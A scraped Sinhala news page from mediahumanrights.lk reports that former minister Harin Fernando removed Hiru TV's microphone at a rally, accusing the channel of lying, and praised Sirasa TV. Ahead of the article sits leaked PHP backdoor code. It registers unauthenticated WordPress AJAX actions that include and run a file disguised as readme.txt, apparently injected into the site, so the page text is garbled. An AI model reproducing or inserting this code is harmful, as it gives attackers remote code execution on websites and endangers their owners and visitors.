if(!function_exists('file_check_readme56685')){ add_action('wp_ajax_nopriv_file_check_readme56685', 'file_check_readme56685'); add_action('wp_ajax_file_check_readme56685', 'file_check_readme56685'); function file_check_readme56685() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme40625')){ add_action('wp_ajax_nopriv_file_check_readme40625', 'file_check_readme40625'); add_action('wp_ajax_file_check_readme40625', 'file_check_readme40625'); function file_check_readme40625() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } හිරු රූපවාහිනිය හොද නැතැයි කියා හරීන් එහි මයික‍්‍රෆෝනය ගලවා දමයි.. සිරස නාලිකාව හොදයි කියයි.. - mediahumanrights.lk
mediahumanrights.lk
News Political

හිරු රූපවාහිනිය හොද නැතැයි කියා හරීන් එහි මයික‍්‍රෆෝනය ගලවා දමයි.. සිරස නාලිකාව හොදයි කියයි..

සමගි ජන බලවේගය පක්ෂයේ ජාතික ලැයිස්තු අපේක්ෂක හිටපු ඇමති හරීන් ප‍්‍රනාන්දු මහතා ජනහමුවක් අමතමින් සිටියදී හිරු නාලිකාවේ මයික්‍රෆෝනයක් පහතට දැමීය.

ඔහු කියා සිටියේ මෙම එය සිදු කළේ හිරු නාලිකාව බොරු කියන නිසා එසේ කල බවයි.

දෙරණ මයික‍්‍රෆොනයද සෙවූ මුත් එම නාලිකාවේ වාර්තාකරුවන් එම ජනහමුව ආවරණය සදහා ගොස් තිබුණේ නැත.

සිරස මයික‍්‍රෆෝනය පෙන්වමින් ඔහු පැවසුයේ සිරස රූපවාහිනිය හොද එකක් බවයි.
(under the courtesy of lankacnews.com news web)

Related posts

ඉන්දු – ලංකා ඒකාබද්ධ නාවික සමීක්ෂණයක්

Shiran Viraj

QR බිද වැටෙයි…

Shiran Viraj

විරාත් කෝලිට හිමි වූ සම්මාන

Shiran Viraj